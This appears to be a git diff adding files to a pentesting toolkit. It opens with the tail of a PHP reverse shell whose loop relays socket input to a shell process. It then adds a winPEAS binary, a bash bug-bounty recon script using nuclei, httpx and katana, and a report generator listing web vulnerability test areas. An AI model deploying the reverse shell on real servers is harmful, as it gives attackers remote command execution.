// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||||
|
stream_set_blocking($pipes[0], 0);
|
||||||
|
stream_set_blocking($pipes[1], 0);
|
||||||
|
stream_set_blocking($pipes[2], 0);
|
||||||
|
stream_set_blocking($sock, 0);
|
||||||
|
|
||||||
|
printit("Successfully opened reverse shell to $ip:$port");
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// Check for end of TCP connection
|
||||||
|
if (feof($sock)) {
|
||||||
|
printit("ERROR: Shell connection terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for end of STDOUT
|
||||||
|
if (feof($pipes[1])) {
|
||||||
|
printit("ERROR: Shell process terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait until a command is end down $sock, or some
|
||||||
|
// command output is available on STDOUT or STDERR
|
||||||
|
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||||
|
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||||
|
|
||||||
|
// If we can read from the TCP socket, send
|
||||||
|
// data to process's STDIN
|
||||||
|
if (in_array($sock, $read_a)) {
|
||||||
|
if ($debug) printit("SOCK READ");
|
||||||
|
$input = fread($sock, $chunk_size);
|
||||||
|
if ($debug) printit("SOCK: $input");
|
||||||
|
fwrite($pipes[0], $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDOUT
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[1], $read_a)) {
|
||||||
|
if ($debug) printit("STDOUT READ");
|
||||||
|
$input = fread($pipes[1], $chunk_size);
|
||||||
|
if ($debug) printit("STDOUT: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDERR
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[2], $read_a)) {
|
||||||
|
if ($debug) printit("STDERR READ");
|
||||||
|
$input = fread($pipes[2], $chunk_size);
|
||||||
|
if ($debug) printit("STDERR: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($sock);
|
||||||
|
fclose($pipes[0]);
|
||||||
|
fclose($pipes[1]);
|
||||||
|
fclose($pipes[2]);
|
||||||
|
proc_close($process);
|
||||||
|
|
||||||
|
// Like print, but does nothing if we've daemonised ourself
|
||||||
|
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||||
|
function printit ($string) {
|
||||||
|
if (!$daemon) {
|
||||||
|
print "$string\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
Binary file not shown.
264
scripts/pentesting/bb-recon
Executable file
264
scripts/pentesting/bb-recon
Executable file
|
|
@ -0,0 +1,264 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: bb-recon
|
||||||
|
# Description: Bug-bounty-safe web application reconnaissance
|
||||||
|
# Usage: bb-recon <url>
|
||||||
|
# Creates tmux window with parallel safe recon (nuclei info/low, katana, subdomain takeover)
|
||||||
|
# Based on Jason Haddix's Bug Hunter Methodology
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}bb-recon${NC} - Bug Bounty Reconnaissance v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " bb-recon <url>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Bug-bounty-safe web reconnaissance with 4 parallel panes:"
|
||||||
|
echo " - Pane 1 (top-left): Nuclei (info/low + subdomain takeover)"
|
||||||
|
echo " - Pane 2 (top-right): httpx (technology detection + security headers)"
|
||||||
|
echo " - Pane 3 (bottom-left): Katana (JS-aware crawler for endpoint discovery)"
|
||||||
|
echo " - Pane 4 (bottom-right): Live results dashboard"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}BUG BOUNTY PHILOSOPHY:${NC}"
|
||||||
|
echo " Based on Jason Haddix's Bug Hunter Methodology:"
|
||||||
|
echo " - Find FEATURES first, bugs second"
|
||||||
|
echo " - Focus on interactive, dynamic applications"
|
||||||
|
echo " - Conservative tools only (no exploitation)"
|
||||||
|
echo " - Discovery over brute-forcing"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " bb-recon https://target.com"
|
||||||
|
echo " bb-recon https://bugcrowd-target.com"
|
||||||
|
echo " bb-recon https://h1-program.hackerone.net"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./bb-recon-<target>-<timestamp>/"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SAFE FOR BUG BOUNTY:${NC}"
|
||||||
|
echo " ✓ No directory brute-forcing (Feroxbuster removed)"
|
||||||
|
echo " ✓ No parameter fuzzing (Arjun removed)"
|
||||||
|
echo " ✓ Info/Low severity only (no exploit templates)"
|
||||||
|
echo " ✓ JS analysis for endpoint discovery (passive)"
|
||||||
|
echo " ✓ Subdomain takeover checks (safe)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
local optional_missing=()
|
||||||
|
|
||||||
|
# Core tools
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
|
||||||
|
# Bug bounty tools (all optional but recommended)
|
||||||
|
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||||
|
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||||
|
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||||
|
echo -e "${CYAN}Install with:${NC}"
|
||||||
|
for tool in "${optional_missing[@]}"; do
|
||||||
|
case "$tool" in
|
||||||
|
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||||
|
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||||
|
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir() {
|
||||||
|
local url="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
OUTPUT_DIR="bb-recon-${clean_url}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main bug bounty recon function
|
||||||
|
run_bb_recon() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Ensure URL has http:// or https://
|
||||||
|
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||||
|
url="https://$url"
|
||||||
|
echo -e "${YELLOW}⚠${NC} No protocol specified, using HTTPS: $url"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Bug Bounty Reconnaissance (Safe Mode) ║"
|
||||||
|
echo "║ Target: $url"
|
||||||
|
echo "║ Based on: Jason Haddix's Methodology ║"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$url"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||||
|
run_scans_sequential "$url"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window
|
||||||
|
WINDOW_NAME="--> BB: ${url:0:20}... <--"
|
||||||
|
tmux new-window -n "$WINDOW_NAME"
|
||||||
|
|
||||||
|
# Split into 4 panes with explicit targeting
|
||||||
|
# Layout: 2x2 grid with pipelines and live monitoring
|
||||||
|
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||||
|
# [1: nuclei] [2: feroxbuster → arjun]
|
||||||
|
# [3: katana] [4: live dashboard]
|
||||||
|
|
||||||
|
# Create 2x2 grid layout
|
||||||
|
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||||
|
# Step 1: split-window -h creates [0:left] [1:right]
|
||||||
|
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||||
|
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||||
|
#
|
||||||
|
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||||
|
|
||||||
|
# Split horizontally first (left | right)
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Split left column vertically
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Split right column vertically (target pane 2 after left split)
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||||
|
tmux select-layout tiled
|
||||||
|
|
||||||
|
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||||
|
# 1 (top-left) 2 (top-right)
|
||||||
|
# 3 (bottom-left) 4 (bottom-right)
|
||||||
|
|
||||||
|
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||||
|
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||||
|
# (pane 0 disappears during the splitting process)
|
||||||
|
|
||||||
|
# Pane 1 (top-left): Nuclei (info/low severity + subdomain takeover)
|
||||||
|
tmux select-pane -t 1
|
||||||
|
if command -v nuclei &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting Nuclei scan (info/low + subdomain takeover)...${NC}' && nuclei -u '$url' -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 2 (top-right): httpx technology detection and security headers
|
||||||
|
tmux select-pane -t 2
|
||||||
|
if command -v httpx &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Technology detection with httpx...${NC}' && echo '$url' | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt && echo -e '${GREEN}✓ httpx complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping tech detection${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||||
|
tmux select-pane -t 3
|
||||||
|
if command -v katana &>/dev/null; then
|
||||||
|
# Full katana with all output formats as originally requested
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 4 (bottom-right): Live results dashboard
|
||||||
|
tmux select-pane -t 4
|
||||||
|
# Watch output files and show live statistics
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ BUG BOUNTY RECON DASHBOARD (SAFE MODE) ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Bug Bounty Safe Reconnaissance ═══${NC}'; echo; echo -e '${GREEN}Nuclei (info/low + takeover):${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || [ -f nuclei.log ] && grep -q 'complete' nuclei.log 2>/dev/null && echo ' Complete (0 findings)' || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Stack (httpx):${NC}'; [ -f httpx.txt ] && [ -s httpx.txt ] && echo \" Detected: \$(grep -c 'http' httpx.txt 2>/dev/null || echo 0) technologies\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana Crawler:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}JS Endpoints:${NC}'; [ -f katana_paths.txt ] && [ -s katana_paths.txt ] && echo \" Discovered: \$(wc -l < katana_paths.txt 2>/dev/null || echo 0) paths\" || echo ' None yet'; echo; echo -e '${CYAN}Latest Discoveries:${NC}'; [ -f katana_urls.txt ] && tail -5 katana_urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||||
|
|
||||||
|
# Focus back on top-left pane (nuclei)
|
||||||
|
tmux select-pane -t 1
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux bug bounty recon window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> BB: ${url:0:20}... <--${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}Bug Bounty Safe:${NC}"
|
||||||
|
echo -e " ✓ No directory brute-forcing"
|
||||||
|
echo -e " ✓ No parameter fuzzing"
|
||||||
|
echo -e " ✓ Info/Low severity only"
|
||||||
|
echo -e " ✓ Passive endpoint discovery"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_scans_sequential() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running nuclei (info/low + subdomain takeover)...${NC}"
|
||||||
|
command -v nuclei &>/dev/null && nuclei -u "$url" -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt || echo "nuclei not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Technology detection with httpx...${NC}"
|
||||||
|
command -v httpx &>/dev/null && echo "$url" | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt || echo "httpx not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running katana (JS-aware crawler)...${NC}"
|
||||||
|
if command -v katana &>/dev/null; then
|
||||||
|
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||||
|
katana -u "$url" -jc -kf all -aff -d 10 -f path -o katana_paths.txt
|
||||||
|
katana -u "$url" -jc -kf all -aff -d 10 -f url -o katana_urls.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Bug bounty recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
url="$1"
|
||||||
|
|
||||||
|
# Validate URL
|
||||||
|
if [[ -z "$url" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} URL required"
|
||||||
|
echo "Usage: bb-recon <url>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run bug bounty reconnaissance
|
||||||
|
run_bb_recon "$url"
|
||||||
353
scripts/pentesting/bb-report-generator
Executable file
353
scripts/pentesting/bb-report-generator
Executable file
|
|
@ -0,0 +1,353 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: bb-report-generator
|
||||||
|
# Description: Generate bug bounty recon report from bb-recon output
|
||||||
|
# Based on Jason Haddix's "Find Features First, Bugs Second" philosophy
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}bb-report-generator${NC} - Bug Bounty Recon Report Generator v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " bb-report-generator <recon-directory>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Analyzes bb-recon output and generates prioritized manual testing guide"
|
||||||
|
echo " Based on Jason Haddix's Bug Hunter Methodology"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " bb-report-generator ./bb-recon-target.com-20240101-120000"
|
||||||
|
echo " bb-report-generator ./bb-recon-*"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " Creates manual-testing-guide.md in the recon directory"
|
||||||
|
}
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
RECON_DIR="$1"
|
||||||
|
|
||||||
|
if [[ ! -d "$RECON_DIR" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Directory not found: $RECON_DIR"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Bug Bounty Recon Report Generator ║"
|
||||||
|
echo "║ Jason Haddix Methodology: Features → Bugs ║"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
REPORT_FILE="$RECON_DIR/manual-testing-guide.md"
|
||||||
|
|
||||||
|
# Start report
|
||||||
|
cat > "$REPORT_FILE" << 'EOF'
|
||||||
|
# Bug Bounty Manual Testing Guide
|
||||||
|
|
||||||
|
**Generated:** $(date)
|
||||||
|
**Philosophy:** Find FEATURES first, then BUGS second (Jason Haddix)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🎯 High Priority Testing Areas
|
||||||
|
|
||||||
|
Based on Jason Haddix's "Heat Map" - where bugs normally hide:
|
||||||
|
|
||||||
|
### 1. Upload Functions 🔥 (HIGHEST PRIORITY)
|
||||||
|
**Why:** Always vulnerable! XSS, XXE, SSRF, Shell upload
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Find all file upload endpoints
|
||||||
|
- [ ] Test XML-based uploads (Docs/PDFs) for XXE and SSRF
|
||||||
|
- [ ] Test image uploads for XSS in filename/EXIF/binary header
|
||||||
|
- [ ] Check where uploaded files are stored (S3 misconfigurations?)
|
||||||
|
- [ ] Try polyglot files (valid image + shell code)
|
||||||
|
|
||||||
|
### 2. APIs 🔥
|
||||||
|
**Why:** Hidden HTTP methods, lack of auth, mass assignment, excessive data exposure
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Test PUT, DELETE, PATCH methods (not just GET/POST)
|
||||||
|
- [ ] Check for missing authentication
|
||||||
|
- [ ] Test for mass assignment vulnerabilities
|
||||||
|
- [ ] Look for excessive data exposure in responses
|
||||||
|
- [ ] Analyze API versioning (v1, v2, etc.) for inconsistencies
|
||||||
|
|
||||||
|
### 3. Account Section (Profile/Settings) 🔥
|
||||||
|
**Why:** Stored XSS, SSTI, SSRF
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Test ALL custom fields for Stored XSS
|
||||||
|
- [ ] Check bio, name, location, custom fields
|
||||||
|
- [ ] Test webhook URLs and callback URLs for SSRF
|
||||||
|
- [ ] Look for integrations that import external content
|
||||||
|
|
||||||
|
### 4. Content Types 🔥
|
||||||
|
**Why:** Multipart-forms "always have a vulnerability"
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Test `multipart/form-data` for shell uploads, injections, bypasses
|
||||||
|
- [ ] Test `Content-Type: application/xml` for XXE
|
||||||
|
- [ ] Test `Content-Type: application/json` for API vulnerabilities
|
||||||
|
|
||||||
|
### 5. Error Messages
|
||||||
|
**Why:** Information disclosure, exotic injection vectors
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Trigger errors intentionally
|
||||||
|
- [ ] Check stack traces for paths, versions, database types
|
||||||
|
- [ ] Test for Application DoS via resource exhaustion
|
||||||
|
|
||||||
|
### 6. URLs/Paths as Values
|
||||||
|
**Why:** SSRF, Open Redirects
|
||||||
|
|
||||||
|
**Actions:**
|
||||||
|
- [ ] Find parameters like: `?url=`, `?redirect=`, `?next=`, `?callback=`
|
||||||
|
- [ ] Test for SSRF vulnerabilities
|
||||||
|
- [ ] Test for open redirects
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 📊 Recon Summary
|
||||||
|
|
||||||
|
EOF
|
||||||
|
|
||||||
|
# Add Technology Stack section
|
||||||
|
echo "### Technology Stack Identified" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
if [[ -f "$RECON_DIR/httpx.txt" ]]; then
|
||||||
|
echo "**Technologies detected (httpx):**" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
cat "$RECON_DIR/httpx.txt" | head -20 >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
elif [[ -f "$RECON_DIR/whatweb.txt" ]]; then
|
||||||
|
echo "**Technologies detected (whatweb):**" >> "$REPORT_FILE"
|
||||||
|
grep -oE '\[[^\]]+\]' "$RECON_DIR/whatweb.txt" | sort -u | head -20 >> "$REPORT_FILE" || echo "None found" >> "$REPORT_FILE"
|
||||||
|
else
|
||||||
|
echo "*No technology fingerprinting data available*" >> "$REPORT_FILE"
|
||||||
|
fi
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add Nuclei Findings section
|
||||||
|
echo "### Nuclei Findings (Info/Low Severity)" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
if [[ -f "$RECON_DIR/nuclei.txt" ]] && [[ -s "$RECON_DIR/nuclei.txt" ]]; then
|
||||||
|
NUCLEI_COUNT=$(wc -l < "$RECON_DIR/nuclei.txt")
|
||||||
|
echo "**Total findings:** $NUCLEI_COUNT" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
head -20 "$RECON_DIR/nuclei.txt" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
else
|
||||||
|
echo "*No Nuclei findings*" >> "$REPORT_FILE"
|
||||||
|
fi
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add Subdomain Takeover section
|
||||||
|
echo "### Subdomain Takeover Check" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
if [[ -f "$RECON_DIR/takeover.txt" ]] && [[ -s "$RECON_DIR/takeover.txt" ]]; then
|
||||||
|
echo "**⚠️ POTENTIAL TAKEOVER VULNERABILITIES FOUND!**" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
cat "$RECON_DIR/takeover.txt" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
else
|
||||||
|
echo "✅ No subdomain takeover vulnerabilities detected" >> "$REPORT_FILE"
|
||||||
|
fi
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add Endpoints Discovered section
|
||||||
|
echo "### Endpoints Discovered (Katana Crawler)" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
if [[ -f "$RECON_DIR/katana_urls.txt" ]] && [[ -s "$RECON_DIR/katana_urls.txt" ]]; then
|
||||||
|
URL_COUNT=$(wc -l < "$RECON_DIR/katana_urls.txt")
|
||||||
|
echo "**Total URLs crawled:** $URL_COUNT" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
echo "**Sample URLs (first 20):**" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
head -20 "$RECON_DIR/katana_urls.txt" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
else
|
||||||
|
echo "*No URLs discovered*" >> "$REPORT_FILE"
|
||||||
|
fi
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add JavaScript Endpoints section
|
||||||
|
echo "### JavaScript Endpoints & Paths" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
if [[ -f "$RECON_DIR/katana_paths.txt" ]] && [[ -s "$RECON_DIR/katana_paths.txt" ]]; then
|
||||||
|
PATH_COUNT=$(wc -l < "$RECON_DIR/katana_paths.txt")
|
||||||
|
echo "**Total paths discovered:** $PATH_COUNT" >> "$REPORT_FILE"
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
echo "**Interesting paths (first 20):**" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
head -20 "$RECON_DIR/katana_paths.txt" >> "$REPORT_FILE"
|
||||||
|
echo '```' >> "$REPORT_FILE"
|
||||||
|
else
|
||||||
|
echo "*No JavaScript paths discovered*" >> "$REPORT_FILE"
|
||||||
|
fi
|
||||||
|
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add "The Big 6 Questions" section
|
||||||
|
cat >> "$REPORT_FILE" << 'EOF'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🔍 The Big 6 Questions (Jason Haddix)
|
||||||
|
|
||||||
|
Answer these before testing:
|
||||||
|
|
||||||
|
### 1. How does the app pass data?
|
||||||
|
**Map ALL input methods:**
|
||||||
|
- [ ] GET parameters
|
||||||
|
- [ ] POST parameters
|
||||||
|
- [ ] JSON body data
|
||||||
|
- [ ] XML body data
|
||||||
|
- [ ] Cookies
|
||||||
|
- [ ] Custom headers (X-*)
